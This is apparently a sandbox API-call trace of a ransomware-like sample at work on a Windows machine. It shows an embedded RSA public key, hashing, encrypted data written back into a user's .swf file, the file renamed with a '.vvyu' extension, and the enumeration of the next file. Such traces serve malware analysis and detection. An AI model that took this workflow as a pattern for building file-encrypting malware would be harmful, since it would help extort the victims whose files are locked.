[0198.414] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.414] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.414] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0198.416] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.416] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.416] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.416] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.416] GetLastError () returned 0x0 [0198.416] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.416] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0198.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.417] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0198.417] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.417] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x15660) returned 0x2d51778 [0198.418] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d700 [0198.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d748 [0198.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5d0 [0198.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a588 [0198.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.419] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5d0 | out: hHeap=0x6a0000) returned 1 [0198.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5d0 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a588 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a570 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bfe0 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0198.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5d0 | out: hHeap=0x6a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.422] GetCurrentThreadId () returned 0x264 [0198.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0198.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c510 [0198.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0198.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.423] GetCurrentThreadId () returned 0x264 [0198.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0198.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5d0 [0198.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0198.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a588 [0198.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5e8 [0198.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0198.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5b8 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5a0 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a600 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5a0 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a570 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5d0 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a600 | out: hHeap=0x6a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0198.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0198.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0198.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0198.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5e8 | out: hHeap=0x6a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d748 | out: hHeap=0x6a0000) returned 1 [0198.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.436] WriteFile (in: hFile=0x52c, lpBuffer=0x2d51778*, nNumberOfBytesToWrite=0x15654, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d51778*, lpNumberOfBytesWritten=0x30ffb14*=0x15654, lpOverlapped=0x0) returned 1 [0198.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d51778 | out: hHeap=0x6a0000) returned 1 [0198.438] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x15659, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.438] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.440] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.440] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.440] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.441] CloseHandle (hObject=0x52c) returned 1 [0198.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d47790 [0198.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0198.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0198.443] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\MQWaq1YvFIYApR.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\mqwaq1yvfiyapr.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\MQWaq1YvFIYApR.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\mqwaq1yvfiyapr.swf.vvyu")) returned 1 [0198.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.446] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.449] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe66ec960, ftCreationTime.dwHighDateTime=0x1d8a71d, ftLastAccessTime.dwLowDateTime=0x8ad4e1c0, ftLastAccessTime.dwHighDateTime=0x1d8a727, ftLastWriteTime.dwLowDateTime=0x8ad4e1c0, ftLastWriteTime.dwHighDateTime=0x1d8a727, nFileSizeHigh=0x0, nFileSizeLow=0x5caf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VHfBb-wQEn1 mz0zc.swf", cAlternateFileName="VHFBB-~1.SWF")) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0198.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.449] PathFindExtensionW 